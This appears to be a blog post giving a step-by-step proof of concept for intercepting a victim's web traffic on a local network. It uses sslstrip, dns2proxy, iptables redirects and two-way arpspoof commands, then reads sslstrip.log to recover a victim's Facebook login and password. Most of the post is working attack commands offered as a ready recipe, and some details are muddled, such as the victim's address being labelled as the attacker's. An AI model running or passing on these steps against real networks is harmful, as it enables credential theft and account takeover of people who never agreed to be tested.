POC OF sslstrip with dns2proxy

POC OF sslstrip with dns2proxy



Introduction:-
This is a POC of sslstrip. Here We intercept the traffic and get all the juicy data enter by the victim
by using the sslstrip-master,dns2proxy-master


Lab Environment:-
Attacker’s operating system:-linux kali 4.13.0-kali-amd64
Victim’s operating system:-window 7
Required tools:-sslstrip-master,dns2proxy-master


Steps of attack:-
Step 1:
#cd sslstrip-master/(change directory to sslstrip-master)
#python setup.py install(install sslstrip-master)




Step 2:
#echo “1” > /proc/sys/net/ipv4/ip_forward(Enables IP forwarding)
#iptables --flush(Removing all firewall rules)
#iptables --flush -t nat()
#iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 9000(forward
all the traffic to port number 9000)
#iptables -t nat -A PREROUTING -p udp --destination-port 53 -j REDIRECT --to-port 53


Step 3:
#ifconfig(for finding the ip address of the attacker’s machine 192.168.29.135)
#route -n(for finding the gateway ip address 192.168.29.2)


Step 4:
#ipconfig(ip address of the attacker’s machine 192.168.29.133)


Step 5:
#cd ..
#cd dns2proxy-master/(change directory to dns2proxy-master)
#python dns2proxy.py(starting dns2proxy-master)
Step 6:
#sslstrip -l 9000(starting listening on port number 9000)


Step 7:
#arpspoof -i eth0 -t 192.168.29.133 192.168.29.2


Step 8:
#arpspoof -i eth0 -t 192.168.29.2 192.168.29.133


Now attack starts:- victim serving anything on their browser we can easily intercept the traffic and
get all the juicy data that they enter on their browser. Now lets see Victim open a facebook and try
to login into their account and after logged in we get the password and id of the victim.after the complete
the process of login sslstrip.log file is there in which all the data of the victim will be there


Step 9:
#cat sslstrip.log(for reading the sslstrip.log)


In last we get the password and id of the victim enter by it into the facebook page.


video :- POC of this attack



Comments

Popular posts from this blog

POC On Sam Decryption

Airgeddon framework